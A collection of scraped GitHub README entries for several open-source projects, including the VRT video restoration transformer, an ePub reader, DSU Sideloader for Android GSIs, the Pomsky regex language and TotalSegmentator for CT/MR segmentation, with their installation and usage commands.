JingyunLiang/VRT;VRT: A Video Restoration Transformer Jingyun Liang , Jiezhang Cao , Yuchen Fan , Kai Zhang , Rakesh Ranjan, Yawei Li , Radu Timofte , Luc Van Gool Computer Vision Lab, ETH Zurich & Meta Inc. arxiv | supplementary | pretrained models | visual results This repository is the official PyTorch implementation of "VRT: A Video Restoration Transformer" ( arxiv , supp , pretrained models , visual results ). VRT achieves state-of-the-art performance in - video SR (REDS, Vimeo90K, Vid4, UDM10)                            :heart_eyes: + 0.33~0.51dB :heart_eyes: - video deblurring (GoPro, DVD, REDS)                                 :heart_eyes: + 1.47~2.15dB :heart_eyes: - video denoising (DAVIS, Set8)                                         :heart_eyes: + 1.56~2.16dB :heart_eyes: - video frame interpolation (Vimeo90K, UCF101, DAVIS)     :heart_eyes: + 0.28~0.45dB :heart_eyes: - space-time video SR (Vimeo90K, Vid4)                                  :heart_eyes: + 0.26~1.03dB :heart_eyes: :rocket: :rocket: :rocket: News : - Oct. 4, 2022 : See the Recurrent Video Restoration Transformer (RVRT, NeurlPS2022) with more balanced model size, testing memory and runtime. - Jun. 15, 2022 : Add results on video frame interpolation and space-time video SR. - Jan. 26, 2022 : See our previous works on | Topic | Title | Badge | |:---:|:------:| :--------------------------: | | transformer-based image restoration | SwinIR: Image Restoration Using Swin Transformer :fire: | | | real-world image SR | Designing a Practical Degradation Model for Deep Blind Image Super-Resolution, ICCV2021 | | | normalizing flow-based image SR and image rescaling | Hierarchical Conditional Flow: A Unified Framework for Image Super-Resolution and Image Rescaling, ICCV2021 | | | blind image SR | Mutual Affine Network for Spatially Variant Kernel Estimation in Blind Image Super-Resolution, ICCV2021 | | | blind image SR | Flow-based Kernel Prior with Application to Blind Super-Resolution, CVPR2021 | | Video restoration (e.g., video super-resolution) aims to restore high-quality frames from low-quality frames. Different from single image restoration, video restoration generally requires to utilize temporal information from multiple adjacent but usually misaligned video frames. Existing deep methods generally tackle with this by exploiting a sliding window strategy or a recurrent architecture, which either is restricted by frame-by-frame restoration or lacks long-range modelling ability. In this paper, we propose a Video Restoration Transformer (VRT) with parallel frame prediction and long-range temporal dependency modelling abilities. More specifically, VRT is composed of multiple scales, each of which consists of two kinds of modules: temporal mutual self attention (TMSA) and parallel warping. TMSA divides the video into small clips, on which mutual attention is applied for joint motion estimation, feature alignment and feature fusion, while self-attention is used for feature extraction. To enable cross-clip interactions, the video sequence is shifted for every other layer. Besides, parallel warping is used to further fuse information from neighboring frames by parallel feature warping. Experimental results on three tasks, including video super-resolution, video deblurring and video denoising, demonstrate that VRT outperforms the state-of-the-art methods by large margins (up to 2.16 dB) on nine benchmark datasets. 
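Before diving into the table of contents and the full command list in Quick Testing below, here is the general shape of an evaluation run, taken from that section. The comments are our reading of the flags rather than official documentation: the three --tile values appear to be the number of frames and the spatial height/width processed at a time, so reducing them trades some accuracy for lower GPU memory use:

```bash
# Example run (command taken from the Quick Testing section below):
# --tile: frames / height / width processed per chunk; reduce if out-of-memory
# --tile_overlap: overlap between neighboring chunks, in the same order
python main_test_vrt.py --task 001_VRT_videosr_bi_REDS_6frames \
    --folder_lq testsets/REDS4/sharp_bicubic \
    --folder_gt testsets/REDS4/GT \
    --tile 40 128 128 --tile_overlap 2 20 20
```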
Contents Requirements Quick Testing Training Results Citation License and Acknowledgement Requirements Python 3.8, PyTorch >= 1.9.1 Requirements: see requirements.txt Platforms: Ubuntu 18.04, cuda-11.1 Quick Testing Following commands will download pretrained models and test datasets automatically (except Vimeo-90K testing set). If out-of-memory, try to reduce --tile at the expense of slightly decreased performance. You can also try to test it on Colab , but the results may be slightly different due to --tile difference. ```bash download code git clone https://github.com/JingyunLiang/VRT cd VRT pip install -r requirements.txt 001, video sr trained on REDS (6 frames), tested on REDS4 python main_test_vrt.py --task 001_VRT_videosr_bi_REDS_6frames --folder_lq testsets/REDS4/sharp_bicubic --folder_gt testsets/REDS4/GT --tile 40 128 128 --tile_overlap 2 20 20 002, video sr trained on REDS (16 frames), tested on REDS4 python main_test_vrt.py --task 002_VRT_videosr_bi_REDS_16frames --folder_lq testsets/REDS4/sharp_bicubic --folder_gt testsets/REDS4/GT --tile 40 128 128 --tile_overlap 2 20 20 003, video sr trained on Vimeo (bicubic), tested on Vid4 and Vimeo python main_test_vrt.py --task 003_VRT_videosr_bi_Vimeo_7frames --folder_lq testsets/Vid4/BIx4 --folder_gt testsets/Vid4/GT --tile 32 128 128 --tile_overlap 2 20 20 python main_test_vrt.py --task 003_VRT_videosr_bi_Vimeo_7frames --folder_lq testsets/vimeo90k/vimeo_septuplet_matlabLRx4/sequences --folder_gt testsets/vimeo90k/vimeo_septuplet/sequences --tile 8 0 0 --tile_overlap 0 20 20 004, video sr trained on Vimeo (blur-downsampling), tested on Vid4, UDM10 and Vimeo python main_test_vrt.py --task 004_VRT_videosr_bd_Vimeo_7frames --folder_lq testsets/Vid4/BDx4 --folder_gt testsets/Vid4/GT --tile 32 128 128 --tile_overlap 2 20 20 python main_test_vrt.py --task 004_VRT_videosr_bd_Vimeo_7frames --folder_lq testsets/UDM10/BDx4 --folder_gt testsets/UDM10/GT --tile 32 128 128 --tile_overlap 2 20 20 python main_test_vrt.py --task 004_VRT_videosr_bd_Vimeo_7frames --folder_lq testsets/vimeo90k/vimeo_septuplet_BDLRx4/sequences --folder_gt testsets/vimeo90k/vimeo_septuplet/sequences --tile 8 0 0 --tile_overlap 0 20 20 005, video deblurring trained and tested on DVD python main_test_vrt.py --task 005_VRT_videodeblurring_DVD --folder_lq testsets/DVD10/test_GT_blurred --folder_gt testsets/DVD10/test_GT --tile 12 256 256 --tile_overlap 2 20 20 006, video deblurring trained and tested on GoPro python main_test_vrt.py --task 006_VRT_videodeblurring_GoPro --folder_lq testsets/GoPro11/test_GT_blurred --folder_gt testsets/GoPro11/test_GT --tile 18 192 192 --tile_overlap 2 20 20 007, video deblurring trained on REDS, tested on REDS4 python main_test_vrt.py --task 007_VRT_videodeblurring_REDS --folder_lq testsets/REDS4/blur --folder_gt testsets/REDS4/GT --tile 12 256 256 --tile_overlap 2 20 20 008, video denoising trained on DAVIS (noise level 0-50), tested on Set8 and DAVIS python main_test_vrt.py --task 008_VRT_videodenoising_DAVIS --sigma 10 --folder_lq testsets/Set8 --folder_gt testsets/Set8 --tile 12 256 256 --tile_overlap 2 20 20 python main_test_vrt.py --task 008_VRT_videodenoising_DAVIS --sigma 10 --folder_lq testsets/DAVIS-test --folder_gt testsets/DAVIS-test --tile 12 256 256 --tile_overlap 2 20 20 009, video frame interpolation trained on Vimeo (single frame interpolation), tested on Viemo, UCF101 and DAVIS-train python main_test_vrt.py --task 009_VRT_videofi_Vimeo_4frames --folder_lq testsets/vimeo90k/vimeo_septuplet/sequences --folder_gt 
testsets/vimeo90k/vimeo_septuplet/sequences --tile 0 0 0 --tile_overlap 0 0 0 python main_test_vrt.py --task 009_VRT_videofi_Vimeo_4frames --folder_lq testsets/UCF101 --folder_gt testsets/UCF101 --tile 0 0 0 --tile_overlap 0 0 0 python main_test_vrt.py --task 009_VRT_videofi_Vimeo_4frames --folder_lq testsets/DAVIS-train --folder_gt testsets/DAVIS-train --tile 0 256 256 --tile_overlap 0 20 20 010, space-time video sr, using pretrained models from 003 and 009, tested on Vid4 and Viemo Please refer to 003 and 009 test on your own datasets (an example) python main_test_vrt.py --task 001_VRT_videosr_bi_REDS_6frames --folder_lq testsets/your/own --tile 40 128 128 --tile_overlap 2 20 20 ``` All visual results of VRT can be downloaded here . Training The training and testing sets are as follows (see the supplementary for a detailed introduction of all datasets). For better I/O speed, use create_lmdb.py to convert .png datasets to .lmdb datasets. Note: You do NOT need to prepare the datasets if you just want to test the model. main_test_vrt.py will download the testing set automaticaly. | Task | Training Set | Testing Set | Pretrained Model and Visual Results of VRT | |:-------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|:--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:| :---: | | video SR (setting 1, BI) | REDS sharp & sharp_bicubic (266 videos, 266000 frames: train + val except REDS4) Use regroup_reds_dataset.py to regroup and rename REDS val set | REDS4 (4 videos, 400 frames: 000, 011, 015, 020 of REDS) | here | | video SR (setting 2 & 3, BI & BD) | Vimeo90K (64612 seven-frame videos as in sep_trainlist.txt ) * Use generate_LR_Vimeo90K.m and generate_LR_Vimeo90K_BD.m to generate LR frames for bicubic and blur-downsampling VSR, respectively. | Vimeo90K-T (the rest 7824 7-frame videos) + Vid4 (4 videos) + UDM10 (10 videos) Use prepare_UDM10.py to regroup and rename the UDM10 dataset | here | | video deblurring (setting 1, motion blur) | DVD (61 videos, 5708 frames) Use prepare_DVD.py to regroup and rename the dataset. | DVD (10 videos, 1000 frames) Use evaluate_video_deblurring.m for final evaluation. | here | | video deblurring (setting 2, motion blur) | GoPro (22 videos, 2103 frames) Use prepare_GoPro_as_video.py to regroup and rename the dataset. | GoPro (11 videos, 1111 frames) Use evaluate_video_deblurring.m for final evaluation. | here | | video deblurring (setting 3, motion blur) | REDS sharp & blur (266 videos, 266000 frames: train & val except REDS4) Use regroup_reds_dataset.py to regroup and rename REDS val set. Note that it shares the same HQ frames as in VSR. 
| REDS4 (4 videos, 400 frames: 000, 011, 015, 020 of REDS) | here | | video denoising (Gaussian noise) | DAVIS-2017 (90 videos, 6208 frames) Use all files in DAVIS/JPEGImages/480p | DAVIS-2017-test (30 videos) + Set8 (8 videos: tractor, touchdown, park_joy and sunflower selected from DERF + hypersmooth, motorbike, rafting and snowboard from GOPRO_540P) | here | | video frame interpolation (single-frame interpolation) | Vimeo90K (64612 seven-frame videos as in sep_trainlist.txt ) | Vimeo90K-T (the rest 7824 7-frame videos) + UCF101 (100 videos, 100 quintuples) + DAVIS-2017 (90 videos, 6208 frames, 2849 quintuples) For DAVIS-2017, use all files in DAVIS/JPEGImages/480p | here | | space-time video SR | Not trained. Using pretrained models 003 and 009. | Vimeo90K-T (the rest 7824 7-frame videos) + Vid4 (4 videos) Using fast/medium/slow splits in data/meta_info. | here | The training code is at KAIR . Results We achieved state-of-the-art performance on video SR, video deblurring and video denoising. Detailed results can be found in the paper . Video Super-Resolution Video Deblurring Video Denoising Video Frame Interpolation Space-Time Video Super-Resolution Citation @article{liang2022vrt, title={VRT: A Video Restoration Transformer}, author={Liang, Jingyun and Cao, Jiezhang and Fan, Yuchen and Zhang, Kai and Ranjan, Rakesh and Li, Yawei and Timofte, Radu and Van Gool, Luc}, journal={arXiv preprint arXiv:2201.12288}, year={2022} } License and Acknowledgement This project is released under the CC-BY-NC license. We reuse code from KAIR , BasicSR , Video Swin Transformer and mmediting . Thanks for their awesome work. The majority of VRT is licensed under CC-BY-NC, however portions of the project are available under separate license terms: KAIR is licensed under the MIT License, BasicSR, Video Swin Transformer and mmediting are licensed under the Apache 2.0 license.;VRT: A Video Restoration Transformer (official repository);transformer,video-restoration,low-level-vision,vision-transformer,video-super-resolution,video-deblurring,video-denoising,video-sr,super-resolution,sr
JingyunLiang/VRT
pacexy/flow;Flow - Open Source Software (OSS) Redefine ePub reader Free. Open source. Browser-based. Features Grid layout Search in book Image preview Custom typography Highlight and Annotation Theme Share/Download book with link Data export Cloud storage For planned features, see our roadmap . Development Prerequisites Node.js pnpm Git Clone the repo bash git clone https://github.com/pacexy/flow Install the dependencies bash pnpm i Set up the environment variables Copy and rename every .env.local.example to .env.local and set the environment variables (a shell sketch follows below). Run the apps bash pnpm dev Self-hosting Before self-hosting, you should set up the environment variables . Docker You can use docker-compose: sh docker compose up -d Or build the image and run it manually: sh docker build -t flow . docker run -p 3000:3000 --env-file apps/reader/.env.local flow Contributing There are many ways in which you can participate in this project, for example: Submit bugs and feature requests , and help us verify fixes as they are checked in Submit pull requests Credits Epub.js React Next.js TypeScript Vercel Turborepo;Browser-based ePub Reader.;epub-reader,nextjs,react,reactjs,typescript,epub,reader,pwa
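A minimal shell sketch of the env-file step above, assuming the `.env.local.example` files live somewhere under the repo root (the `find` invocation is an illustration, not part of the flow docs):

```sh
# From the repo root: for every .env.local.example found, create a
# sibling .env.local copy in the same directory, ready to be edited.
find . -name ".env.local.example" -execdir cp {} .env.local \;
```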
pacexy/flow
ErickWendel/semana-javascript-expert06;Spotify Radio - JS Expert Week 6.0 Welcome to the sixth JavaScript Expert Week. This is the starting code for our journey. Give this project a star 🌟 Preview Checklist Features Web API [ ] Must achieve 100% code coverage in tests [ ] Must have end to end tests validating all API routes [ ] Must deliver static files as Node.js Streams [ ] Must deliver music files as a Node.js Stream [ ] Given a disconnected user it should not break the API [ ] Even if multiple commands are fired at the same time, it should not break the API [ ] If an unexpected error occurs, the API should keep working [ ] The project needs to run on Linux, Mac and Windows environments Web App Client [ ] Must play the broadcast [ ] Shouldn't pause if any effects are added Controller [ ] Must achieve 100% code coverage in tests [ ] Must be able to start or stop a broadcast [ ] Must send commands to add audio effects to a stream Tasks per class Lesson 01: Cover service and route layers with unit tests and achieve 100% code coverage Lesson 02: Maintain 100% code coverage and implement e2e tests for the entire API Lesson 03: implement unit tests for the frontend and maintain 100% code coverage PLUS : [ ] provide a new effect [ ] add a new button on the controller [ ] add a new effect sound to the audios/fx/ folder [ ] redeploy on Heroku Source code for classes and solved challenges Class01 desafio-resolvido (solved challenge) and page with 100% code coverage Class02 desafio-resolvido and page with 100% code coverage Class03 desafio-resolvido and page with 100% code coverage Credits to the sources I've used on the demos Streaming English Conversation Effects Applause Applause Audience Boo Fart Laugh FAQ NODE_OPTIONS is not recognized as a command, what should I do? If you are on Windows, the way to create environment variables is different. You must use the word set before the command. Ex: "test": "set NODE_OPTIONS=--experimental-vm-modules && npx jest --runInBand", I ran npm test but nothing happens, what should I do? Check your Node.js version. We are using version 17. Go to the node.js website and download the latest version. jest.spyOn - when we try to use function.name (something like stream.pipe.name ), it says the instance is undefined In this case, use the value as a string: jest.spyOn(stream, "pipe").mockReturnValue (a runnable sketch follows below) Challenge 01: 100% code coverage is impossible because testUtil.js is not being fully used Add the following code snippet to the first line of the testUtil.js file: /* istanbul ignore file */ . This will make jest ignore this file and reach 100%. Important: this change only serves to complete the first and/or second challenge; in the last class we will not need to ignore this file, since we will use all of its functions;JS Expert Week 6.0 Classes - Spotify Radio;nodejs,streams,audio,sox,spotify,javascript,jest,tests,e2e,unit
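To make the jest.spyOn answer above concrete, here is a hedged sketch of the workaround, assuming the course's ESM Jest setup (NODE_OPTIONS=--experimental-vm-modules); the PassThrough stream is illustrative:

```js
import { jest } from '@jest/globals'
import { PassThrough } from 'stream'

describe('stream piping', () => {
  test('pipe can be stubbed without relying on function.name', () => {
    const stream = new PassThrough()
    // Referencing stream.pipe.name may come back undefined on some
    // instances, so spy on the method using its name as a plain string.
    jest.spyOn(stream, 'pipe').mockReturnValue(stream)

    const result = stream.pipe(new PassThrough())
    expect(stream.pipe).toHaveBeenCalled()
    expect(result).toBe(stream)
  })
})
```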
ErickWendel/semana-javascript-expert06
riccardoperra/codeimage;Create elegant code screenshots of your source code. Introduction CodeImage is the newest tool to help developers create beautiful screenshots of their code, providing several features to speed up the process of posting to social media. 🤖 Tech stack The CodeImage architecture consists of a PNPM monorepo, currently subdivided into packages and apps . Apps @codeimage/app The front-end application, entirely built with SolidJS. It currently also relies on these libraries: vanilla-extract : Zero-runtime Stylesheets-in-TypeScript. CodeMirror6 : Extensible code editor StateBuilder : Composable state management @codeui/kit : Accessible UI Kit based on Kobalte solid-primitives : SolidJS primitives library @codeimage/api The REST API layer built with Fastify , Prisma ORM and Auth0 . Packages @codeimage/ui : contains the source code of the UI kit of the CodeImage front-end application. Note the UI kit is being moved to the @codeui/kit repository @codeimage/config : contains the base configurations and interfaces for CodeImage @codeimage/highlight : contains the custom editor and highlighting themes for CodeMirror @codeimage/dom-export : contains the html-to-image fork which includes several fixes for image export @codeimage/locale : contains a wrapper of @solid-primitives/i18n which includes strict typing for i18n @codeimage/vanilla-extract : contains the Vanilla Extract plugin fork which includes SolidJS and PNPM fixes to work in a monorepo. @codeimage/prisma-models : contains the Prisma ORM backend models shared across the front-end and back-end applications. @codeimage/atomic-state : contains the source code of a small state manager which includes some utility helpers for RxJS and solid-js/store 🌏 Contributions Warning Read this before opening any PR! When contributing, it's better to first discuss the change you wish to make with the owners of this repository, via issue, discussion, or any other method, before making a change. See the CONTRIBUTING.md guide for more details. CodeImage is the winner of SolidHack 2022 for the Best Application category! License MIT © Riccardo Perra;A tool to beautify your code screenshots. Built with SolidJS and Fastify.;solid-js,solid,code,editor,screenshot,snippets,tweet,sharing,codesnippets,beautiful
riccardoperra/codeimage
tnballo/high-assurance-rust;High Assurance Rust Click here to read now: https://highassurance.rs/ What does this book aim to do? Provide an accessible but principled introduction to developing secure and robust systems. At the overlap of "state-of-the-art" and "near-term practical": mostly production-grade tools and techniques, but also some cutting-edge research projects. All open-source. Help experienced developers both learn a new language and delve deeper into fundamental Computer Science and Computer Architecture topics. How can I help? If you find this content valuable, consider increasing its visibility among developers by starring this GitHub repo. Much appreciated! :) To cite this book directly in your own work, please use this BibTeX or similar: @misc{high_assurance_rust, title={High Assurance Rust: Developing Secure and Robust Software}, url={https://highassurance.rs}, howpublished = "\url{https://highassurance.rs}", author={Ballo, Tiemoko and Ballo, Moumine and James, Alex}, year={2022} } Interested in a physical print? Please sign up here if you'd like to be notified when the book is finished and hard copies are available. The email you provide will not be shared or used for any other purpose. Have feedback or questions? Your input matters. We'd love to hear from you; please send an email to: contact@highassurance.rs Can I contribute? Contributions are welcome and appreciated. Please see CONTRIBUTING.md . Anything else I should know? A great deal of effort went into making this book a reality. We hope you have as much fun reading as we did writing. Let's hack together!;A free book about developing secure and robust systems software.;rust,security,reliability,systems-programming,book
tnballo/high-assurance-rust
VegaBobo/DSU-Sideloader;DSU Sideloader A simple app made to help users easily install GSIs via DSU's Android feature. Requirements Android 10 or higher Unlocked Bootloader Device with Dynamic Partitions A GSI you want to use! Community GSIs: https://github.com/phhusson/treble_experimentations/wiki/Generic-System-Image-%28GSI%29-list Google GSIs: https://developer.android.com/topic/generic-system-image/releases * Remember to use GSIs compatible with your architecture, VNDK implementation, etc. Downloads Or download the latest APK from the Releases Section . For testing builds, you can check artifacts at the Actions tab How to use? Install the app. When opening it for the first time, you need to grant read/write permission to a folder: create a new folder and allow access (this folder will be used to store temporary files, such as GSIs extracted from compressed files). Select a GSI to install (accepted formats are: gz, xz, img and zip (DSU packages only)). You can customize the installation as you want, e.g. changing the userdata size for the dynamic system (changing the GSI file size is not recommended; let the app do it automatically). Tap on "Install". Wait until it finishes! (it may take some time) Once it finishes, the next step may vary: If the built-in installer is enabled, no extra step is required. When the built-in installer is disabled, in rooted/system/shizuku operation mode, the DSU screen will appear, prompting you to confirm installation; after that, check your notifications, and DSU should start installing the GSI. In ADB operation mode, you will be prompted to run a command in adb; once you run it, the DSU screen will appear asking you to confirm installation, and after that DSU should start installing the GSI. Once the dynamic system is ready, you can boot into it through the notification or, if the operation mode supports it, directly from our app. For more usage information, you can check Operation modes Operation modes DSU Sideloader supports multiple operation modes, which define how the app works. The operation mode is detected automatically and, for now, it is impossible to change it manually; the picked operation mode is the best one available (the priority is listed below: the most feature-complete mode has the highest number, and the most basic one the lowest).
ADB: Default operation mode when other modes aren't available Only prepares the selected image to be installed via the DSU system app Requires an adb command to start installation (which will invoke the DSU system app to install the prepared file) Shizuku: When running the app with Shizuku (obtained when Shizuku permission is granted) Same as ADB; however, it does not require running any adb command Supports tracking installation progress ¹ ² ³ Supports installation diagnostics (if a common error is detected, it may give you useful information) ¹ ³ Root: When running the app with root permissions (obtained when the user grants root permission) All features available in Shizuku; however, it does not require any special permissions DynamicSystem API features (check if DSU is installed, reboot to DSU, discard..., everything directly from the app) Supports the built-in DSU installer ⁴ ⁵ System mode: When running as a system app (obtained by installing our Magisk module) All features available in Shizuku Fixes for some common gsi/dsu-related SELinux denials Custom gsid binary (can fix some installation errors on some devices ⁵ ⁶) System/Root mode: When running as a system app with granted root permission (obtained by installing our Magisk module and granting root permission) All features available in root and system operation modes ¹ Requires READ_LOGS permission. ² Partial support on Android 10 and 11. ³ Android 13 requires "One-time log access". ⁴ Feature not supported on Android 10. ⁵ Experimental feature, the built-in installer code is here . ⁶ The module including the custom gsid binary is optional; changes made to the AOSP gsid binary can be found here . Recommendations For non-rooted devices, Shizuku is a pretty nice operation mode: it supports most features with no hassle; however, you need to install and set up the Shizuku app on your device. For rooted devices, Root operation mode is more than OK for most people. If you're having issues with the DSU feature, go with System/Root. Devices rooted via Magisk should be running Magisk v24 or higher; older versions may break the DSU feature. We highly recommend using this app with a stock ROM; some custom ROM builds may also work fine. Common questions DSU installation finishes with no errors, but the device doesn't boot into the installed DSU; what should I do? It is likely that AVB is preventing the device from booting installed images; try flashing a disabled vbmeta (see the fastboot sketch below), and check this for more info. Why isn't it possible to set a high userdata value? The more free storage you have, the more you can allocate as your userdata, but some Android versions limit the maximum allowed allocation (this limit is 40%, and it is not our app's limitation, it comes from Android itself; you can use our custom gsid binary, which reduces this limit to 20%. It is possible to eliminate it entirely, but we have no clue whether that has implications, so we only decided to decrease it). Why does the "Unmount SD" option exist? If available, DSU prioritizes allocation on the SD card, but allocating on the SD card is not supported in some cases (it may depend on the filesystem present on the SD card, and on whether allocation on SD is allowed by the OS itself). Since allocating on SD may cause installation errors on some devices, that option is here to enforce allocation in device storage. Why does the built-in installer require root? Because it uses Android's internal DynamicSystem API, which requires "MANAGE_DYNAMIC_SYSTEM", a signature-level protection; the convenient way to circumvent it is by using root.
shell (2000) has "INSTALL_DYNAMIC_SYSTEM", which is able to call DSU system-app (this one has "MANAGE_DYNAMIC_SYSTEM") to install images. How about updates? Our app comes with a updater, you can check updates in "About" section. Other question? problem? Feel free to start a issue, for troubleshooting, don't forget to send logs (logs can be obtained on installation phase, directly on app, when operation mode support installation diagnostics). About DSU DSU (Dynamic System Updates), is a feature introduced on Android 10, that let developers boot GSIs without touching current system partition, this is done by creating new partitions to hold a GSI and a separated userdata, to boot on them when desired. Unfortunelly, DSU depends on Dynamic Partitions (your device need to support, otherwise, won't work), and most GSIs requires unlocked bootloader to get them booting properly (since only OEM-Signed GSIs are allowed to boot on locked bootloader). GSIs can be installed via DSU without root access, using ADB, running some commands, you can read more about installation process here: https://developer.android.com/topic/dsu Once installation finishes, Android creates a persistent notification allowing you to boot into "Dynamic System" (GSI installed via DSU), and you can boot into installed GSI, without touching your system partition, or breaking the "real userdata" partition. After booting Dynamic System, you can try and test whatever you want, when you need to switch back to device's original system image, everything you need to do, is just, a simple reboot! When doing a long test, that may requires lots of reboots, this can be a pain, however, is possible to enable "sticky mode", that enforces dynamic system, instead of device's original system image, once tests are done, you can disable sticky mode and return to original system image. That is basically a quickly explanation about DSU, a amazing feature, like a "dual-boot" solution, limited, however, very safe (since no read-only partition will be modified, and if GSI does not boot, just a simple reboot will return you to the original device's system image). You can read more about DSU here: https://source.android.com/devices/tech/ota/dynamic-system-updates How to enable Sticky Mode? Reboot to Dynamic System, and: - use this command on adb: adb shell gsi_tool enable - or from local adb shell: gsi_tool enable - or from local rooted shell (eg. Termux on rooted GSI): su -c 'gsi_tool enable' When sticky mode is enabled, device will always boot into dynamic system, instead of device's original system image. To disable, use the same command, instead of enable , use disable Other For translators, we now have a Crowdin, feel free send your translations: https://crowdin.com/translate/dsu-sideloader/ App icon made by WSTxda;A simple app made to help users easily install GSIs via DSU's Android feature.;[]
VegaBobo/DSU-Sideloader
pomsky-lang/pomsky;![Pomsky logo](https://raw.githubusercontent.com/pomsky-lang/pomsky/main/assets/logo.svg) # Pomsky A portable 1 , modern regular expression language [![Website][web-badge]][web-link] [![Docs][doc-badge]][doc-link] [![Playground][playground-badge]][playground-link] [![VS Code plugin][vscode-badge]][vscode-link] [![Discord][discord-badge]][discord-link] [![Crates.io][crates-badge]][crates-link] Get Started To begin, check out the website . What's New Read the blog or the changelog to learn about new features. Installation Pre-built binaries can be found on the releases page . Pomsky can also be installed from source via cargo with cargo install pomsky-bin . Compatibility Pomsky is currently compatible with PCRE, JavaScript, Java, .NET, Python, Ruby and Rust. The regex flavor must be specified during compilation, so Pomsky can ensure that the produced regex works as desired on the targeted regex engine. Note : You should enable Unicode support in your regex engine, if it isn't enabled by default. This is explained here . Portability Pomsky aims to be as portable as possible, polyfilling Unicode and unsupported features where feasible. That said, there are some cases where portability is not possible: Some features (e.g. lookaround, backreferences, Unicode properties) aren't supported in every flavor. Pomsky fails to compile when you're using an unsupported feature. \b (word boundaries) are not Unicode aware in JavaScript. Pomsky therefore only allows word boundaries when Unicode is disabled. \w in .NET handles Unicode incorrectly, with no way to polyfill it properly. This means that in .NET, [word] only matches the L , Mn , Nd , and Pc general categories, instead of Alphabetic , M , Nd , Pc and Join_Control . In .NET, . , Codepoint and character classes (e.g. [Latin] ) only match a single UTF-16 code unit rather than a codepoint. [space] matches slightly different code points in JavaScript than in Java. This will be fixed. Backreferences behave differently in JavaScript and Python when the referenced group has no captured text. There is nothing we can do about it, but we could add a warning for this in the future. Security Never compile or execute an untrusted Pomsky expression on your critical infrastructure . This may make you vulnerable for denial of service attacks, like the Billion Laughs attack . Read more Diagnostics Pomsky looks for mistakes and displays helpful diagnostics: It shows an error if you use a feature not supported by the targeted regex flavor It detects syntax errors and shows suggestions on how to resolve them It parses backslash escapes (which are not allowed in a Pomsky expression) and explains what to write instead It looks for likely mistakes and displays warnings It looks for patterns that can be very slow for certain inputs and are susceptible to Denial-of-Service attacks (coming soon) Comparison with other projects I wrote an in-depth comparison with similar projects, which you can find here . Code of Conduct The Code of Conduct can be found here . Contributing You can contribute by using Pomsky and providing feedback. If you find a bug or have a question, please create an issue. I also gladly accept code contributions. More information Sponsor this project Go to my sponsors page License Dual-licensed under the MIT license or the Apache 2.0 license .;A new, portable, regular expression language;regex,regexp,regular-expression,pomsky,rust-lang
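As a small taste of the language described above, here is a sketch of a Pomsky expression with named captures, together with an illustrative CLI invocation; the exact flags of the pomsky binary may differ from this sketch, so check pomsky --help:

```sh
# Compile a Pomsky expression matching a semantic version like "1.2.3"
# into a JavaScript-flavored regex. ":name(...)" creates a named capture
# group, and [digit] is the built-in digit character class.
pomsky --flavor javascript ":major([digit]+) '.' :minor([digit]+) '.' :patch([digit]+)"
```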
pomsky-lang/pomsky
wasserth/TotalSegmentator;TotalSegmentator Tool for segmentation of most major anatomical structures in any CT or MR image. It was trained on a wide range of different CT and MR images (different scanners, institutions, protocols,...) and therefore should work well on most images. A large part of the training dataset can be downloaded here: CT dataset (1228 subjects) and MR dataset (298 subjects). You can also try the tool online at totalsegmentator.com . ANNOUNCEMENT: We recently added support for MR images. Try it out by using the task -ta total_mr or see more details in our paper . Supported classes for CT: Supported classes for MR: Created by the department of Research and Analysis at University Hospital Basel . If you use it please cite our Radiology AI paper ( free preprint ). If you use it for MR images please cite the TotalSegmentator MRI paper . Please also cite nnUNet since TotalSegmentator is heavily based on it. Installation TotalSegmentator works on Ubuntu, Mac, and Windows and on CPU and GPU. Install dependencies: * Python >= 3.9 * Pytorch >= 2.0.0 Optionally: * if you use the option --preview you have to install xvfb ( apt-get install xvfb ) and fury ( pip install fury ) Install TotalSegmentator pip install TotalSegmentator Usage For CT images: TotalSegmentator -i ct.nii.gz -o segmentations For MR images: TotalSegmentator -i mri.nii.gz -o segmentations --task total_mr Note: A Nifti file or a folder (or zip file) with all DICOM slices of one patient is allowed as input. Note: If you run on CPU use the option --fast or --roi_subset to greatly improve runtime. Note: This is not a medical device and is not intended for clinical usage. Subtasks Next to the default task ( total ) there are more subtasks with more classes. If the task name ends with _mr it works for MR images, otherwise for CT images. Openly available for any usage: * total : default task containing 117 main classes (see here for a list of classes) * total_mr : default task containing 56 main classes on MR images (see here for a list of classes) * lung_vessels : lung_vessels (cite paper ), lung_trachea_bronchia * body : body, body_trunc, body_extremities, skin * cerebral_bleed : intracerebral_hemorrhage (cite paper ) * hip_implant : hip_implant * coronary_arteries : coronary_arteries * pleural_pericard_effusion : pleural_effusion (cite paper ), pericardial_effusion (cite paper ) *: These models are not trained on the full totalsegmentator dataset but on some other, smaller datasets. Therefore, expect them to work less robustly. Available with a license (free licenses available for non-commercial usage here . For a commercial license contact jakob.wasserthal@usb.ch): * heartchambers_highres : myocardium, atrium_left, ventricle_left, atrium_right, ventricle_right, aorta, pulmonary_artery (trained on sub-millimeter resolution) * appendicular_bones : patella, tibia, fibula, tarsal, metatarsal, phalanges_feet, ulna, radius, carpal, metacarpal, phalanges_hand * tissue_types : subcutaneous_fat, torso_fat, skeletal_muscle * tissue_types_mr : subcutaneous_fat, torso_fat, skeletal_muscle (for MR images) * vertebrae_body : vertebral body of all vertebrae (without the vertebral arch) * face : face_region Usage: TotalSegmentator -i ct.nii.gz -o segmentations -ta <task_name> The mapping from label ID to class name can be found here . Advanced settings --device : Choose cpu or gpu or gpu:X (e.g., gpu:1 -> cuda:1) --fast : Use this option for faster runtime and lower memory requirements.
